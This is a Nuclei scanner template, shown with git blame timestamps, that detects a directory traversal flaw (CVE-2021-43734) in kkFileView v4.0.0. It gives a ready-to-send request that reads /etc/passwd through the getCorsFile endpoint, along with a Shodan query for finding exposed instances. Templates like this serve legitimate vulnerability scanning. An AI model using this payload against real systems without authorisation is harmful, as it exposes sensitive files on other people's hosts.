nuclei-templates/cves/2021/CVE-2021-43734.yaml

36 lines
919 B
YAML
Raw Normal View History

2022-08-18 11:29:11 +00:00
id: CVE-2021-43734
info:
name: kkFileview v4.0.0 - Directory Traversal
author: arafatansari
2022-08-18 11:39:16 +00:00
severity: high
description: |
kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.
2022-08-18 11:29:11 +00:00
reference:
- https://github.com/kekingcn/kkFileView/issues/304
2022-08-19 09:29:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
2022-08-19 09:34:57 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-08-19 09:34:57 +00:00
cve-id: CVE-2021-43734
cwe-id: CWE-22
2022-08-18 11:29:11 +00:00
metadata:
shodan-query: http.html:"kkFileView"
verified: "true"
2022-08-21 08:30:49 +00:00
tags: cve,cve2021,kkfileview,traversal
2022-08-18 11:29:11 +00:00
requests:
- method: GET
path:
2022-08-19 09:14:27 +00:00
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
2022-08-18 11:29:11 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200